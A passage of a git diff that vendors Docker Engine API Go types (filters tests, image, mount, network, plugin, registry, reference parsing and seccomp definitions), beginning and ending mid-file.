{"value1": true}, "key2": {"value2": true}}`, + }, + } + + for _, invalid := 
range invalids { + if _, err := FromParam(invalid); err == nil { + t.Fatalf("Expected an error with %v, got nothing", invalid) + } + } + + for expectedArgs, matchers := range valid { + for _, json := range matchers { + args, err := FromParam(json) + if err != nil { + t.Fatal(err) + } + if args.Len() != expectedArgs.Len() { + t.Fatalf("Expected %v, go %v", expectedArgs, args) + } + for key, expectedValues := range expectedArgs.fields { + values := args.Get(key) + + if len(values) != len(expectedValues) { + t.Fatalf("Expected %v, go %v", expectedArgs, args) + } + + for _, v := range values { + if !expectedValues[v] { + t.Fatalf("Expected %v, go %v", expectedArgs, args) + } + } + } + } + } +} + +func TestEmpty(t *testing.T) { + a := Args{} + v, err := ToParam(a) + if err != nil { + t.Errorf("failed to marshal the filters: %s", err) + } + v1, err := FromParam(v) + if err != nil { + t.Errorf("%s", err) + } + if a.Len() != v1.Len() { + t.Errorf("these should both be empty sets") + } +} + +func TestArgsMatchKVListEmptySources(t *testing.T) { + args := NewArgs() + if !args.MatchKVList("created", map[string]string{}) { + t.Fatalf("Expected true for (%v,created), got true", args) + } + + args = Args{map[string]map[string]bool{"created": {"today": true}}} + if args.MatchKVList("created", map[string]string{}) { + t.Fatalf("Expected false for (%v,created), got true", args) + } +} + +func TestArgsMatchKVList(t *testing.T) { + // Not empty sources + sources := map[string]string{ + "key1": "value1", + "key2": "value2", + "key3": "value3", + } + + matches := map[*Args]string{ + &Args{}: "field", + &Args{map[string]map[string]bool{ + "created": map[string]bool{"today": true}, + "labels": map[string]bool{"key1": true}}, + }: "labels", + &Args{map[string]map[string]bool{ + "created": map[string]bool{"today": true}, + "labels": map[string]bool{"key1=value1": true}}, + }: "labels", + } + + for args, field := range matches { + if args.MatchKVList(field, sources) != true { + 
t.Fatalf("Expected true for %v on %v, got false", sources, args) + } + } + + differs := map[*Args]string{ + &Args{map[string]map[string]bool{ + "created": map[string]bool{"today": true}}, + }: "created", + &Args{map[string]map[string]bool{ + "created": map[string]bool{"today": true}, + "labels": map[string]bool{"key4": true}}, + }: "labels", + &Args{map[string]map[string]bool{ + "created": map[string]bool{"today": true}, + "labels": map[string]bool{"key1=value3": true}}, + }: "labels", + } + + for args, field := range differs { + if args.MatchKVList(field, sources) != false { + t.Fatalf("Expected false for %v on %v, got true", sources, args) + } + } +} + +func TestArgsMatch(t *testing.T) { + source := "today" + + matches := map[*Args]string{ + &Args{}: "field", + &Args{map[string]map[string]bool{ + "created": map[string]bool{"today": true}}, + }: "today", + &Args{map[string]map[string]bool{ + "created": map[string]bool{"to*": true}}, + }: "created", + &Args{map[string]map[string]bool{ + "created": map[string]bool{"to(.*)": true}}, + }: "created", + &Args{map[string]map[string]bool{ + "created": map[string]bool{"tod": true}}, + }: "created", + &Args{map[string]map[string]bool{ + "created": map[string]bool{"anyting": true, "to*": true}}, + }: "created", + } + + for args, field := range matches { + if args.Match(field, source) != true { + t.Fatalf("Expected true for %v on %v, got false", source, args) + } + } + + differs := map[*Args]string{ + &Args{map[string]map[string]bool{ + "created": map[string]bool{"tomorrow": true}}, + }: "created", + &Args{map[string]map[string]bool{ + "created": map[string]bool{"to(day": true}}, + }: "created", + &Args{map[string]map[string]bool{ + "created": map[string]bool{"tom(.*)": true}}, + }: "created", + &Args{map[string]map[string]bool{ + "created": map[string]bool{"tom": true}}, + }: "created", + &Args{map[string]map[string]bool{ + "created": map[string]bool{"today1": true}, + "labels": map[string]bool{"today": true}}, + }: 
"created", + } + + for args, field := range differs { + if args.Match(field, source) != false { + t.Fatalf("Expected false for %v on %v, got true", source, args) + } + } +} + +func TestAdd(t *testing.T) { + f := NewArgs() + f.Add("status", "running") + v := f.fields["status"] + if len(v) != 1 || !v["running"] { + t.Fatalf("Expected to include a running status, got %v", v) + } + + f.Add("status", "paused") + if len(v) != 2 || !v["paused"] { + t.Fatalf("Expected to include a paused status, got %v", v) + } +} + +func TestDel(t *testing.T) { + f := NewArgs() + f.Add("status", "running") + f.Del("status", "running") + v := f.fields["status"] + if v["running"] { + t.Fatalf("Expected to not include a running status filter, got true") + } +} + +func TestLen(t *testing.T) { + f := NewArgs() + if f.Len() != 0 { + t.Fatalf("Expected to not include any field") + } + f.Add("status", "running") + if f.Len() != 1 { + t.Fatalf("Expected to include one field") + } +} + +func TestExactMatch(t *testing.T) { + f := NewArgs() + + if !f.ExactMatch("status", "running") { + t.Fatalf("Expected to match `running` when there are no filters, got false") + } + + f.Add("status", "running") + f.Add("status", "pause*") + + if !f.ExactMatch("status", "running") { + t.Fatalf("Expected to match `running` with one of the filters, got false") + } + + if f.ExactMatch("status", "paused") { + t.Fatalf("Expected to not match `paused` with one of the filters, got true") + } +} + +func TestOnlyOneExactMatch(t *testing.T) { + f := NewArgs() + + if !f.UniqueExactMatch("status", "running") { + t.Fatalf("Expected to match `running` when there are no filters, got false") + } + + f.Add("status", "running") + + if !f.UniqueExactMatch("status", "running") { + t.Fatalf("Expected to match `running` with one of the filters, got false") + } + + if f.UniqueExactMatch("status", "paused") { + t.Fatalf("Expected to not match `paused` with one of the filters, got true") + } + + f.Add("status", "pause") + if 
f.UniqueExactMatch("status", "running") { + t.Fatalf("Expected to not match only `running` with two filters, got true") + } +} + +func TestInclude(t *testing.T) { + f := NewArgs() + if f.Include("status") { + t.Fatalf("Expected to not include a status key, got true") + } + f.Add("status", "running") + if !f.Include("status") { + t.Fatalf("Expected to include a status key, got false") + } +} + +func TestValidate(t *testing.T) { + f := NewArgs() + f.Add("status", "running") + + valid := map[string]bool{ + "status": true, + "dangling": true, + } + + if err := f.Validate(valid); err != nil { + t.Fatal(err) + } + + f.Add("bogus", "running") + if err := f.Validate(valid); err == nil { + t.Fatalf("Expected to return an error, got nil") + } +} + +func TestWalkValues(t *testing.T) { + f := NewArgs() + f.Add("status", "running") + f.Add("status", "paused") + + f.WalkValues("status", func(value string) error { + if value != "running" && value != "paused" { + t.Fatalf("Unexpected value %s", value) + } + return nil + }) + + err := f.WalkValues("status", func(value string) error { + return fmt.Errorf("return") + }) + if err == nil { + t.Fatalf("Expected to get an error, got nil") + } + + err = f.WalkValues("foo", func(value string) error { + return fmt.Errorf("return") + }) + if err != nil { + t.Fatalf("Expected to not iterate when the field doesn't exist, got %v", err) + } +} + +func TestFuzzyMatch(t *testing.T) { + f := NewArgs() + f.Add("container", "foo") + + cases := map[string]bool{ + "foo": true, + "foobar": true, + "barfoo": false, + "bar": false, + } + for source, match := range cases { + got := f.FuzzyMatch("container", source) + if got != match { + t.Fatalf("Expected %v, got %v: %s", match, got, source) + } + } +} diff --git a/vendor/github.com/docker/docker/api/types/id_response.go b/vendor/github.com/docker/docker/api/types/id_response.go new file mode 100644 index 0000000000..7592d2f8b1 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/id_response.go @@ 
-0,0 +1,13 @@ +package types + +// This file was generated by the swagger tool. +// Editing this file might prove futile when you re-run the swagger generate command + +// IDResponse Response to an API call that returns just an Id +// swagger:model IdResponse +type IDResponse struct { + + // The id of the newly created object. + // Required: true + ID string `json:"Id"` +} diff --git a/vendor/github.com/docker/docker/api/types/image_summary.go b/vendor/github.com/docker/docker/api/types/image_summary.go new file mode 100644 index 0000000000..e145b3dcfc --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/image_summary.go @@ -0,0 +1,49 @@ +package types + +// This file was generated by the swagger tool. +// Editing this file might prove futile when you re-run the swagger generate command + +// ImageSummary image summary +// swagger:model ImageSummary +type ImageSummary struct { + + // containers + // Required: true + Containers int64 `json:"Containers"` + + // created + // Required: true + Created int64 `json:"Created"` + + // Id + // Required: true + ID string `json:"Id"` + + // labels + // Required: true + Labels map[string]string `json:"Labels"` + + // parent Id + // Required: true + ParentID string `json:"ParentId"` + + // repo digests + // Required: true + RepoDigests []string `json:"RepoDigests"` + + // repo tags + // Required: true + RepoTags []string `json:"RepoTags"` + + // shared size + // Required: true + SharedSize int64 `json:"SharedSize"` + + // size + // Required: true + Size int64 `json:"Size"` + + // virtual size + // Required: true + VirtualSize int64 `json:"VirtualSize"` +} diff --git a/vendor/github.com/docker/docker/api/types/mount/mount.go b/vendor/github.com/docker/docker/api/types/mount/mount.go new file mode 100644 index 0000000000..31f2365b8e --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/mount/mount.go @@ -0,0 +1,113 @@ +package mount + +import ( + "os" +) + +// Type represents the type of a mount. 
+type Type string + +// Type constants +const ( + // TypeBind is the type for mounting host dir + TypeBind Type = "bind" + // TypeVolume is the type for remote storage volumes + TypeVolume Type = "volume" + // TypeTmpfs is the type for mounting tmpfs + TypeTmpfs Type = "tmpfs" +) + +// Mount represents a mount (volume). +type Mount struct { + Type Type `json:",omitempty"` + // Source specifies the name of the mount. Depending on mount type, this + // may be a volume name or a host path, or even ignored. + // Source is not supported for tmpfs (must be an empty value) + Source string `json:",omitempty"` + Target string `json:",omitempty"` + ReadOnly bool `json:",omitempty"` + + BindOptions *BindOptions `json:",omitempty"` + VolumeOptions *VolumeOptions `json:",omitempty"` + TmpfsOptions *TmpfsOptions `json:",omitempty"` +} + +// Propagation represents the propagation of a mount. +type Propagation string + +const ( + // PropagationRPrivate RPRIVATE + PropagationRPrivate Propagation = "rprivate" + // PropagationPrivate PRIVATE + PropagationPrivate Propagation = "private" + // PropagationRShared RSHARED + PropagationRShared Propagation = "rshared" + // PropagationShared SHARED + PropagationShared Propagation = "shared" + // PropagationRSlave RSLAVE + PropagationRSlave Propagation = "rslave" + // PropagationSlave SLAVE + PropagationSlave Propagation = "slave" +) + +// Propagations is the list of all valid mount propagations +var Propagations = []Propagation{ + PropagationRPrivate, + PropagationPrivate, + PropagationRShared, + PropagationShared, + PropagationRSlave, + PropagationSlave, +} + +// BindOptions defines options specific to mounts of type "bind". +type BindOptions struct { + Propagation Propagation `json:",omitempty"` +} + +// VolumeOptions represents the options for a mount of type volume. 
+type VolumeOptions struct { + NoCopy bool `json:",omitempty"` + Labels map[string]string `json:",omitempty"` + DriverConfig *Driver `json:",omitempty"` +} + +// Driver represents a volume driver. +type Driver struct { + Name string `json:",omitempty"` + Options map[string]string `json:",omitempty"` +} + +// TmpfsOptions defines options specific to mounts of type "tmpfs". +type TmpfsOptions struct { + // Size sets the size of the tmpfs, in bytes. + // + // This will be converted to an operating system specific value + // depending on the host. For example, on linux, it will be convered to + // use a 'k', 'm' or 'g' syntax. BSD, though not widely supported with + // docker, uses a straight byte value. + // + // Percentages are not supported. + SizeBytes int64 `json:",omitempty"` + // Mode of the tmpfs upon creation + Mode os.FileMode `json:",omitempty"` + + // TODO(stevvooe): There are several more tmpfs flags, specified in the + // daemon, that are accepted. Only the most basic are added for now. + // + // From docker/docker/pkg/mount/flags.go: + // + // var validFlags = map[string]bool{ + // "": true, + // "size": true, X + // "mode": true, X + // "uid": true, + // "gid": true, + // "nr_inodes": true, + // "nr_blocks": true, + // "mpol": true, + // } + // + // Some of these may be straightforward to add, but others, such as + // uid/gid have implications in a clustered system. 
+} diff --git a/vendor/github.com/docker/docker/api/types/network/network.go b/vendor/github.com/docker/docker/api/types/network/network.go new file mode 100644 index 0000000000..832b3edb9f --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/network/network.go @@ -0,0 +1,59 @@ +package network + +// Address represents an IP address +type Address struct { + Addr string + PrefixLen int +} + +// IPAM represents IP Address Management +type IPAM struct { + Driver string + Options map[string]string //Per network IPAM driver options + Config []IPAMConfig +} + +// IPAMConfig represents IPAM configurations +type IPAMConfig struct { + Subnet string `json:",omitempty"` + IPRange string `json:",omitempty"` + Gateway string `json:",omitempty"` + AuxAddress map[string]string `json:"AuxiliaryAddresses,omitempty"` +} + +// EndpointIPAMConfig represents IPAM configurations for the endpoint +type EndpointIPAMConfig struct { + IPv4Address string `json:",omitempty"` + IPv6Address string `json:",omitempty"` + LinkLocalIPs []string `json:",omitempty"` +} + +// PeerInfo represents one peer of a overlay network +type PeerInfo struct { + Name string + IP string +} + +// EndpointSettings stores the network endpoint details +type EndpointSettings struct { + // Configurations + IPAMConfig *EndpointIPAMConfig + Links []string + Aliases []string + // Operational data + NetworkID string + EndpointID string + Gateway string + IPAddress string + IPPrefixLen int + IPv6Gateway string + GlobalIPv6Address string + GlobalIPv6PrefixLen int + MacAddress string +} + +// NetworkingConfig represents the container's networking configuration for each of its interfaces +// Carries the networking configs specified in the `docker run` and `docker network connect` commands +type NetworkingConfig struct { + EndpointsConfig map[string]*EndpointSettings // Endpoint configs for each connecting network +} diff --git a/vendor/github.com/docker/docker/api/types/plugin.go 
b/vendor/github.com/docker/docker/api/types/plugin.go new file mode 100644 index 0000000000..6cc7a23b02 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/plugin.go @@ -0,0 +1,189 @@ +package types + +// This file was generated by the swagger tool. +// Editing this file might prove futile when you re-run the swagger generate command + +// Plugin A plugin for the Engine API +// swagger:model Plugin +type Plugin struct { + + // config + // Required: true + Config PluginConfig `json:"Config"` + + // True when the plugin is running. False when the plugin is not running, only installed. + // Required: true + Enabled bool `json:"Enabled"` + + // Id + ID string `json:"Id,omitempty"` + + // name + // Required: true + Name string `json:"Name"` + + // plugin remote reference used to push/pull the plugin + PluginReference string `json:"PluginReference,omitempty"` + + // settings + // Required: true + Settings PluginSettings `json:"Settings"` +} + +// PluginConfig The config of a plugin. 
+// swagger:model PluginConfig +type PluginConfig struct { + + // args + // Required: true + Args PluginConfigArgs `json:"Args"` + + // description + // Required: true + Description string `json:"Description"` + + // documentation + // Required: true + Documentation string `json:"Documentation"` + + // entrypoint + // Required: true + Entrypoint []string `json:"Entrypoint"` + + // env + // Required: true + Env []PluginEnv `json:"Env"` + + // interface + // Required: true + Interface PluginConfigInterface `json:"Interface"` + + // linux + // Required: true + Linux PluginConfigLinux `json:"Linux"` + + // mounts + // Required: true + Mounts []PluginMount `json:"Mounts"` + + // network + // Required: true + Network PluginConfigNetwork `json:"Network"` + + // propagated mount + // Required: true + PropagatedMount string `json:"PropagatedMount"` + + // user + User PluginConfigUser `json:"User,omitempty"` + + // work dir + // Required: true + WorkDir string `json:"WorkDir"` + + // rootfs + Rootfs *PluginConfigRootfs `json:"rootfs,omitempty"` +} + +// PluginConfigArgs plugin config args +// swagger:model PluginConfigArgs +type PluginConfigArgs struct { + + // description + // Required: true + Description string `json:"Description"` + + // name + // Required: true + Name string `json:"Name"` + + // settable + // Required: true + Settable []string `json:"Settable"` + + // value + // Required: true + Value []string `json:"Value"` +} + +// PluginConfigInterface The interface between Docker and the plugin +// swagger:model PluginConfigInterface +type PluginConfigInterface struct { + + // socket + // Required: true + Socket string `json:"Socket"` + + // types + // Required: true + Types []PluginInterfaceType `json:"Types"` +} + +// PluginConfigLinux plugin config linux +// swagger:model PluginConfigLinux +type PluginConfigLinux struct { + + // allow all devices + // Required: true + AllowAllDevices bool `json:"AllowAllDevices"` + + // capabilities + // Required: true + 
Capabilities []string `json:"Capabilities"` + + // devices + // Required: true + Devices []PluginDevice `json:"Devices"` +} + +// PluginConfigNetwork plugin config network +// swagger:model PluginConfigNetwork +type PluginConfigNetwork struct { + + // type + // Required: true + Type string `json:"Type"` +} + +// PluginConfigRootfs plugin config rootfs +// swagger:model PluginConfigRootfs +type PluginConfigRootfs struct { + + // diff ids + DiffIds []string `json:"diff_ids"` + + // type + Type string `json:"type,omitempty"` +} + +// PluginConfigUser plugin config user +// swagger:model PluginConfigUser +type PluginConfigUser struct { + + // g ID + GID uint32 `json:"GID,omitempty"` + + // UID + UID uint32 `json:"UID,omitempty"` +} + +// PluginSettings Settings that can be modified by users. +// swagger:model PluginSettings +type PluginSettings struct { + + // args + // Required: true + Args []string `json:"Args"` + + // devices + // Required: true + Devices []PluginDevice `json:"Devices"` + + // env + // Required: true + Env []string `json:"Env"` + + // mounts + // Required: true + Mounts []PluginMount `json:"Mounts"` +} diff --git a/vendor/github.com/docker/docker/api/types/plugin_device.go b/vendor/github.com/docker/docker/api/types/plugin_device.go new file mode 100644 index 0000000000..5699010675 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/plugin_device.go @@ -0,0 +1,25 @@ +package types + +// This file was generated by the swagger tool. 
+// Editing this file might prove futile when you re-run the swagger generate command + +// PluginDevice plugin device +// swagger:model PluginDevice +type PluginDevice struct { + + // description + // Required: true + Description string `json:"Description"` + + // name + // Required: true + Name string `json:"Name"` + + // path + // Required: true + Path *string `json:"Path"` + + // settable + // Required: true + Settable []string `json:"Settable"` +} diff --git a/vendor/github.com/docker/docker/api/types/plugin_env.go b/vendor/github.com/docker/docker/api/types/plugin_env.go new file mode 100644 index 0000000000..32962dc2eb --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/plugin_env.go @@ -0,0 +1,25 @@ +package types + +// This file was generated by the swagger tool. +// Editing this file might prove futile when you re-run the swagger generate command + +// PluginEnv plugin env +// swagger:model PluginEnv +type PluginEnv struct { + + // description + // Required: true + Description string `json:"Description"` + + // name + // Required: true + Name string `json:"Name"` + + // settable + // Required: true + Settable []string `json:"Settable"` + + // value + // Required: true + Value *string `json:"Value"` +} diff --git a/vendor/github.com/docker/docker/api/types/plugin_interface_type.go b/vendor/github.com/docker/docker/api/types/plugin_interface_type.go new file mode 100644 index 0000000000..c82f204e87 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/plugin_interface_type.go @@ -0,0 +1,21 @@ +package types + +// This file was generated by the swagger tool. 
+// Editing this file might prove futile when you re-run the swagger generate command + +// PluginInterfaceType plugin interface type +// swagger:model PluginInterfaceType +type PluginInterfaceType struct { + + // capability + // Required: true + Capability string `json:"Capability"` + + // prefix + // Required: true + Prefix string `json:"Prefix"` + + // version + // Required: true + Version string `json:"Version"` +} diff --git a/vendor/github.com/docker/docker/api/types/plugin_mount.go b/vendor/github.com/docker/docker/api/types/plugin_mount.go new file mode 100644 index 0000000000..5c031cf8b5 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/plugin_mount.go @@ -0,0 +1,37 @@ +package types + +// This file was generated by the swagger tool. +// Editing this file might prove futile when you re-run the swagger generate command + +// PluginMount plugin mount +// swagger:model PluginMount +type PluginMount struct { + + // description + // Required: true + Description string `json:"Description"` + + // destination + // Required: true + Destination string `json:"Destination"` + + // name + // Required: true + Name string `json:"Name"` + + // options + // Required: true + Options []string `json:"Options"` + + // settable + // Required: true + Settable []string `json:"Settable"` + + // source + // Required: true + Source *string `json:"Source"` + + // type + // Required: true + Type string `json:"Type"` +} diff --git a/vendor/github.com/docker/docker/api/types/plugin_responses.go b/vendor/github.com/docker/docker/api/types/plugin_responses.go new file mode 100644 index 0000000000..d6f7553119 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/plugin_responses.go @@ -0,0 +1,64 @@ +package types + +import ( + "encoding/json" + "fmt" +) + +// PluginsListResponse contains the response for the Engine API +type PluginsListResponse []*Plugin + +const ( + authzDriver = "AuthzDriver" + graphDriver = "GraphDriver" + ipamDriver = "IpamDriver" + networkDriver = 
"NetworkDriver" + volumeDriver = "VolumeDriver" +) + +// UnmarshalJSON implements json.Unmarshaler for PluginInterfaceType +func (t *PluginInterfaceType) UnmarshalJSON(p []byte) error { + versionIndex := len(p) + prefixIndex := 0 + if len(p) < 2 || p[0] != '"' || p[len(p)-1] != '"' { + return fmt.Errorf("%q is not a plugin interface type", p) + } + p = p[1 : len(p)-1] +loop: + for i, b := range p { + switch b { + case '.': + prefixIndex = i + case '/': + versionIndex = i + break loop + } + } + t.Prefix = string(p[:prefixIndex]) + t.Capability = string(p[prefixIndex+1 : versionIndex]) + if versionIndex < len(p) { + t.Version = string(p[versionIndex+1:]) + } + return nil +} + +// MarshalJSON implements json.Marshaler for PluginInterfaceType +func (t *PluginInterfaceType) MarshalJSON() ([]byte, error) { + return json.Marshal(t.String()) +} + +// String implements fmt.Stringer for PluginInterfaceType +func (t PluginInterfaceType) String() string { + return fmt.Sprintf("%s.%s/%s", t.Prefix, t.Capability, t.Version) +} + +// PluginPrivilege describes a permission the user has to accept +// upon installing a plugin. +type PluginPrivilege struct { + Name string + Description string + Value []string +} + +// PluginPrivileges is a list of PluginPrivilege +type PluginPrivileges []PluginPrivilege diff --git a/vendor/github.com/docker/docker/api/types/port.go b/vendor/github.com/docker/docker/api/types/port.go new file mode 100644 index 0000000000..ad52d46d56 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/port.go @@ -0,0 +1,23 @@ +package types + +// This file was generated by the swagger tool. 
+// Editing this file might prove futile when you re-run the swagger generate command + +// Port An open port on a container +// swagger:model Port +type Port struct { + + // IP + IP string `json:"IP,omitempty"` + + // Port on the container + // Required: true + PrivatePort uint16 `json:"PrivatePort"` + + // Port exposed on the host + PublicPort uint16 `json:"PublicPort,omitempty"` + + // type + // Required: true + Type string `json:"Type"` +} diff --git a/vendor/github.com/docker/docker/api/types/reference/image_reference.go b/vendor/github.com/docker/docker/api/types/reference/image_reference.go new file mode 100644 index 0000000000..be9cf8ebed --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/reference/image_reference.go @@ -0,0 +1,34 @@ +package reference + +import ( + distreference "github.com/docker/distribution/reference" +) + +// Parse parses the given references and returns the repository and +// tag (if present) from it. If there is an error during parsing, it will +// return an error. +func Parse(ref string) (string, string, error) { + distributionRef, err := distreference.ParseNamed(ref) + if err != nil { + return "", "", err + } + + tag := GetTagFromNamedRef(distributionRef) + return distributionRef.Name(), tag, nil +} + +// GetTagFromNamedRef returns a tag from the specified reference. +// This function is necessary as long as the docker "server" api makes the distinction between repository +// and tags. 
+func GetTagFromNamedRef(ref distreference.Named) string { + var tag string + switch x := ref.(type) { + case distreference.Digested: + tag = x.Digest().String() + case distreference.NamedTagged: + tag = x.Tag() + default: + tag = "latest" + } + return tag +} diff --git a/vendor/github.com/docker/docker/api/types/reference/image_reference_test.go b/vendor/github.com/docker/docker/api/types/reference/image_reference_test.go new file mode 100644 index 0000000000..61fb676b6c --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/reference/image_reference_test.go @@ -0,0 +1,72 @@ +package reference + +import ( + "testing" +) + +func TestParse(t *testing.T) { + testCases := []struct { + ref string + expectedName string + expectedTag string + expectedError bool + }{ + { + ref: "", + expectedName: "", + expectedTag: "", + expectedError: true, + }, + { + ref: "repository", + expectedName: "repository", + expectedTag: "latest", + expectedError: false, + }, + { + ref: "repository:tag", + expectedName: "repository", + expectedTag: "tag", + expectedError: false, + }, + { + ref: "test.com/repository", + expectedName: "test.com/repository", + expectedTag: "latest", + expectedError: false, + }, + { + ref: "test.com:5000/test/repository", + expectedName: "test.com:5000/test/repository", + expectedTag: "latest", + expectedError: false, + }, + { + ref: "test.com:5000/repo@sha256:ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff", + expectedName: "test.com:5000/repo", + expectedTag: "sha256:ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff", + expectedError: false, + }, + { + ref: "test.com:5000/repo:tag@sha256:ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff", + expectedName: "test.com:5000/repo", + expectedTag: "sha256:ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff", + expectedError: false, + }, + } + + for _, c := range testCases { + name, tag, err := Parse(c.ref) + if err != nil && c.expectedError { + continue 
+ } else if err != nil { + t.Fatalf("error with %s: %s", c.ref, err.Error()) + } + if name != c.expectedName { + t.Fatalf("expected name %s, got %s", c.expectedName, name) + } + if tag != c.expectedTag { + t.Fatalf("expected tag %s, got %s", c.expectedTag, tag) + } + } +} diff --git a/vendor/github.com/docker/docker/api/types/registry/authenticate.go b/vendor/github.com/docker/docker/api/types/registry/authenticate.go new file mode 100644 index 0000000000..5e37d19bd4 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/registry/authenticate.go @@ -0,0 +1,21 @@ +package registry + +// ---------------------------------------------------------------------------- +// DO NOT EDIT THIS FILE +// This file was generated by `swagger generate operation` +// +// See hack/swagger-gen.sh +// ---------------------------------------------------------------------------- + +// AuthenticateOKBody authenticate o k body +// swagger:model AuthenticateOKBody +type AuthenticateOKBody struct { + + // An opaque token used to authenticate a user after a successful login + // Required: true + IdentityToken string `json:"IdentityToken"` + + // The status of the authentication + // Required: true + Status string `json:"Status"` +} diff --git a/vendor/github.com/docker/docker/api/types/registry/registry.go b/vendor/github.com/docker/docker/api/types/registry/registry.go new file mode 100644 index 0000000000..28fafab901 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/registry/registry.go @@ -0,0 +1,104 @@ +package registry + +import ( + "encoding/json" + "net" +) + +// ServiceConfig stores daemon registry services configuration. 
+type ServiceConfig struct { + InsecureRegistryCIDRs []*NetIPNet `json:"InsecureRegistryCIDRs"` + IndexConfigs map[string]*IndexInfo `json:"IndexConfigs"` + Mirrors []string +} + +// NetIPNet is the net.IPNet type, which can be marshalled and +// unmarshalled to JSON +type NetIPNet net.IPNet + +// String returns the CIDR notation of ipnet +func (ipnet *NetIPNet) String() string { + return (*net.IPNet)(ipnet).String() +} + +// MarshalJSON returns the JSON representation of the IPNet +func (ipnet *NetIPNet) MarshalJSON() ([]byte, error) { + return json.Marshal((*net.IPNet)(ipnet).String()) +} + +// UnmarshalJSON sets the IPNet from a byte array of JSON +func (ipnet *NetIPNet) UnmarshalJSON(b []byte) (err error) { + var ipnetStr string + if err = json.Unmarshal(b, &ipnetStr); err == nil { + var cidr *net.IPNet + if _, cidr, err = net.ParseCIDR(ipnetStr); err == nil { + *ipnet = NetIPNet(*cidr) + } + } + return +} + +// IndexInfo contains information about a registry +// +// RepositoryInfo Examples: +// { +// "Index" : { +// "Name" : "docker.io", +// "Mirrors" : ["https://registry-2.docker.io/v1/", "https://registry-3.docker.io/v1/"], +// "Secure" : true, +// "Official" : true, +// }, +// "RemoteName" : "library/debian", +// "LocalName" : "debian", +// "CanonicalName" : "docker.io/debian" +// "Official" : true, +// } +// +// { +// "Index" : { +// "Name" : "127.0.0.1:5000", +// "Mirrors" : [], +// "Secure" : false, +// "Official" : false, +// }, +// "RemoteName" : "user/repo", +// "LocalName" : "127.0.0.1:5000/user/repo", +// "CanonicalName" : "127.0.0.1:5000/user/repo", +// "Official" : false, +// } +type IndexInfo struct { + // Name is the name of the registry, such as "docker.io" + Name string + // Mirrors is a list of mirrors, expressed as URIs + Mirrors []string + // Secure is set to false if the registry is part of the list of + // insecure registries. Insecure registries accept HTTP and/or accept + // HTTPS with certificates from unknown CAs. 
+ Secure bool + // Official indicates whether this is an official registry + Official bool +} + +// SearchResult describes a search result returned from a registry +type SearchResult struct { + // StarCount indicates the number of stars this repository has + StarCount int `json:"star_count"` + // IsOfficial is true if the result is from an official repository. + IsOfficial bool `json:"is_official"` + // Name is the name of the repository + Name string `json:"name"` + // IsAutomated indicates whether the result is automated + IsAutomated bool `json:"is_automated"` + // Description is a textual description of the repository + Description string `json:"description"` +} + +// SearchResults lists a collection search results returned from a registry +type SearchResults struct { + // Query contains the query string that generated the search results + Query string `json:"query"` + // NumResults indicates the number of results the query returned + NumResults int `json:"num_results"` + // Results is a slice containing the actual results for the search + Results []SearchResult `json:"results"` +} diff --git a/vendor/github.com/docker/docker/api/types/seccomp.go b/vendor/github.com/docker/docker/api/types/seccomp.go new file mode 100644 index 0000000000..4f02ef36b8 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/seccomp.go @@ -0,0 +1,93 @@ +package types + +// Seccomp represents the config for a seccomp profile for syscall restriction. +type Seccomp struct { + DefaultAction Action `json:"defaultAction"` + // Architectures is kept to maintain backward compatibility with the old + // seccomp profile. 
+ Architectures []Arch `json:"architectures,omitempty"` + ArchMap []Architecture `json:"archMap,omitempty"` + Syscalls []*Syscall `json:"syscalls"` +} + +// Architecture is used to represent an specific architecture +// and its sub-architectures +type Architecture struct { + Arch Arch `json:"architecture"` + SubArches []Arch `json:"subArchitectures"` +} + +// Arch used for architectures +type Arch string + +// Additional architectures permitted to be used for system calls +// By default only the native architecture of the kernel is permitted +const ( + ArchX86 Arch = "SCMP_ARCH_X86" + ArchX86_64 Arch = "SCMP_ARCH_X86_64" + ArchX32 Arch = "SCMP_ARCH_X32" + ArchARM Arch = "SCMP_ARCH_ARM" + ArchAARCH64 Arch = "SCMP_ARCH_AARCH64" + ArchMIPS Arch = "SCMP_ARCH_MIPS" + ArchMIPS64 Arch = "SCMP_ARCH_MIPS64" + ArchMIPS64N32 Arch = "SCMP_ARCH_MIPS64N32" + ArchMIPSEL Arch = "SCMP_ARCH_MIPSEL" + ArchMIPSEL64 Arch = "SCMP_ARCH_MIPSEL64" + ArchMIPSEL64N32 Arch = "SCMP_ARCH_MIPSEL64N32" + ArchPPC Arch = "SCMP_ARCH_PPC" + ArchPPC64 Arch = "SCMP_ARCH_PPC64" + ArchPPC64LE Arch = "SCMP_ARCH_PPC64LE" + ArchS390 Arch = "SCMP_ARCH_S390" + ArchS390X Arch = "SCMP_ARCH_S390X" +) + +// Action taken upon Seccomp rule match +type Action string + +// Define actions for Seccomp rules +const ( + ActKill Action = "SCMP_ACT_KILL" + ActTrap Action = "SCMP_ACT_TRAP" + ActErrno Action = "SCMP_ACT_ERRNO" + ActTrace Action = "SCMP_ACT_TRACE" + ActAllow Action = "SCMP_ACT_ALLOW" +) + +// Operator used to match syscall arguments in Seccomp +type Operator string + +// Define operators for syscall arguments in Seccomp +const ( + OpNotEqual Operator = "SCMP_CMP_NE" + OpLessThan Operator = "SCMP_CMP_LT" + OpLessEqual Operator = "SCMP_CMP_LE" + OpEqualTo Operator = "SCMP_CMP_EQ" + OpGreaterEqual Operator = "SCMP_CMP_GE" + OpGreaterThan Operator = "SCMP_CMP_GT" + OpMaskedEqual Operator = "SCMP_CMP_MASKED_EQ" +) + +// Arg used for matching specific syscall arguments in Seccomp +type Arg struct { + Index uint 
